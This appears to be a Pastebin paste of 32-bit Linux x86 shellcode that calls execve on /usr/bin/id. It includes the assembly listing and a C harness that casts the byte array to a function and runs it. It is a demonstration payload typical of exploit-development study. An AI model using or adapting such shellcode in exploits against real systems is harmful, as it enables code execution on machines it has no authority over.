Guest User

Untitled

a guest
Apr 25th, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. /////////////////////////////////////
  2. // Shellcode
  3. // ---------
  4. // execve("/usr/bin/id");
  5. // Author : 0x0syscall
  6. // HaKSyN Security TeaM
  7. ////////////////////////////////////
  8.  
  9. // xor %eax,%eax
  10. // push %eax
  11. // push $0x64692f6e
  12. // push $0x69622f72
  13. // push $0x73752f2f
  14. // mov %esp,%ebx
  15. // push %eax
  16. // mov %esp,%edx
  17. // push %ebx
  18. // mov %esp,%ecx
  19. // mov $0xb,%al
  20. // int $0x80
  21.  
  22.  
  23. #include "stdio.h"
  24.  
  25. main()
  26. {
  27. char shellcode[] = "\x31\xc0\x50\x68\x6e\x2f\x69\x64\x68\x72\x2f\x62\x69"
  28. "\x68\x2f\x2f\x75\x73\x89\xe3\x50\x89\xe2\x53\x89\xe1"
  29. "\xb0\x0b\xcd\x80";
  30.  
  31. (*(void(*)()) shellcode)();
  32. }
Add Comment
Please, Sign In to add comment